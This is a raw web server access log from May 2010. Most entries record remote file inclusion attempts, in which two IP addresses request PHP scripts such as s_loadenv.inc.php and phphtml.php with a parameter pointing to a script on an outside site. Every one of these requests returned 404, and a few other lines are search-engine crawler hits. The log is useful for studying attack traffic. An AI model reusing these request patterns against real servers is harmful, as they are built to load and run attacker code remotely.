217.149.62.1 - - [05/May/2010:22:05:51 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.149.62.1 - - [05/May/2010:22:05:51 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.149.62.1 - - [05/May/2010:22:06:23 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.149.62.1 - - [05/May/2010:22:06:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.149.62.1 - - [05/May/2010:22:06:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kelsborrowchoir.org/data/idfx1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
87.250.255.243 - - [05/May/2010:22:12:06 -0500] "GET /logs/access_log.1257033600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.192 - - [05/May/2010:22:17:52 -0500] "GET /logs/access_log.1256428800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.138.88.246 - - [05/May/2010:22:22:09 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
78.138.88.246 - - [05/May/2010:22:22:09 -0500] "GET /phphtml.php?htmlclass_path=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
78.138.88.246 - - [05/May/2010:22:22:24 -0500] "GET /phphtml.php?htmlclass_path=http://www.kelsborrowchoir.org/data/test.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
